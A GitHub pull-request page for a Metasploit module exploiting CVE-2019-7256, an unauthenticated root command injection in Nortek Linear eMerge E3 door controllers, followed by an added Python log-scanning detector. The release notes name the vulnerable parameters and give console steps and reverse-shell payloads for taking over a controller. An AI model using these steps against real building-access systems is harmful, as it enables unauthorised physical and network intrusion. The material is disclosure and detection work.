Pre-Authenticated Remote Code Execution in Nortek Linear eMerge Access Controller [CVE-2019-7256] #17312
Gents, are we still moving on this module?
@h00die-gr3y Sorry for the delay, most of the team has been out on holiday and we also had end of the year tasks that kept us from getting to this. Will take a look at this today/tomorrow once I've finished reviewing another PR.
…alidation on server response. 4910f73 to f39973d
Alright, looks like everything should be good now. Also rebased to make sure there were no merge conflicts and to squash 2 commits down. Will land once tests pass.
Woot, all tests passed, will land this now. Thanks for your help and time on this PR @h00die-gr3y!
Release Notes
An exploit has been added for CVE-2019-7256, an unauthenticated command injection vulnerability in Linear eMerge E3 versions
Nortek Security & Control, LLC (NSC) is a leader in wireless security, home automation and personal safety systems and devices. The eMerge E3-Series is part of Linear’s access control platform that delivers entry-level access control to buildings.
It is a web-based application where the HTTP web interface is typically exposed to the public internet.
The Linear eMerge E3-Series with firmware versions `1.00-06` and below is vulnerable to an unauthenticated command injection remote root exploit that leverages card_scan_decoder.php. This can be exploited to inject and execute arbitrary shell commands as the root user through the `No` and `door` HTTP GET parameters. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with root privileges.
Building automation and access control systems are at the heart of many critical infrastructures, and their security is vital.
Executing attacks on these systems may enable unauthenticated attackers to access and manipulate doors, elevators, air-conditioning systems, cameras, boilers, lights, safety alarm systems within a building.
This issue affects all Linear eMerge E3 versions up to and including `1.00-06`.
Installing a vulnerable test bed requires a Linear eMerge E3-Series access controller with the vulnerable software loaded.
This module has been tested against a Linear eMerge access controller with the specifications listed below:
v1.00-03
Verification
use exploit/linux/http/linear_emerge_unauth_rce_cve_2019_7256
set RHOSTS <TARGET HOSTS>
set RPORT <port>
set LHOST <attacker host ip>
set LPORT <attacker host port>
set TARGET <0-Unix command or 1-Linux Dropper>
exploit
You should get a `bash` shell or `meterpreter` session depending on the target and payload settings.
Options
No specific options.
Scenarios
Nortek Linear eMerge E3 Elite access controller bash reverse shell
Nortek Linear eMerge E3 Elite access controller meterpreter session
Limitations
Due to the limitations of restricted `busybox` command implementation on the Linear eMerge E3 Access Controller, only a few unix command payloads will work, such as `cmd/unix/reverse_bash` or `cmd/unix/reverse` (telnet).
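
On the detection side, access logs from the controller or a reverse proxy in front of it can be checked for requests to card_scan_decoder.php whose `No` or `door` value is not a plain identifier. This is an added example, not code from the pull request or from Metasploit; the log format (Common Log Format), the allowlist for legitimate values, the URL path and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Endpoint and parameter names come from the module documentation above.
ENDPOINT = "card_scan_decoder.php"
PARAMS = ("No", "door")
# Assumption: legitimate values are short alphanumeric identifiers.
SAFE_VALUE = re.compile(r"[A-Za-z0-9_-]{1,32}")
# Assumption: Common/Combined Log Format; captures source and request target.
REQUEST = re.compile(r'^(?P<src>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')


def suspicious_params(target):
    """Return {param: value} for No/door values that fail the allowlist."""
    parts = urlsplit(target)
    if parts.path.rsplit("/", 1)[-1] != ENDPOINT:
        return {}
    # parse_qs percent-decodes, so encoded metacharacters are seen in clear.
    query = parse_qs(parts.query)
    return {
        name: value
        for name in PARAMS
        for value in query.get(name, [])
        if not SAFE_VALUE.fullmatch(value)
    }


def scan(lines):
    """Return a list of (source_ip, offending_params) for flagged log lines."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        bad = suspicious_params(m.group("target")) if m else {}
        if bad:
            hits.append((m.group("src"), bad))
    return hits


# Constructed sample log lines (documentation-range IPs, placeholder values).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2023:10:00:00 +0000] "GET /card_scan_decoder.php?No=30&door=1 HTTP/1.1" 200 12',
    '198.51.100.7 - - [01/Jan/2023:10:00:05 +0000] "GET /card_scan_decoder.php?No=30&door=%60PLACEHOLDER%60 HTTP/1.1" 200 0',
    '198.51.100.7 - - [01/Jan/2023:10:00:09 +0000] "GET /card_scan_decoder.php?No=1%3BPLACEHOLDER&door=1 HTTP/1.1" 200 0',
    '192.0.2.10 - - [01/Jan/2023:10:01:00 +0000] "GET /index.php?door=%60x%60 HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for src, bad in scan(SAMPLE_LOG):
        print(src, bad)
```

The allowlist should be tuned to the values a given deployment actually sends before alerting on it.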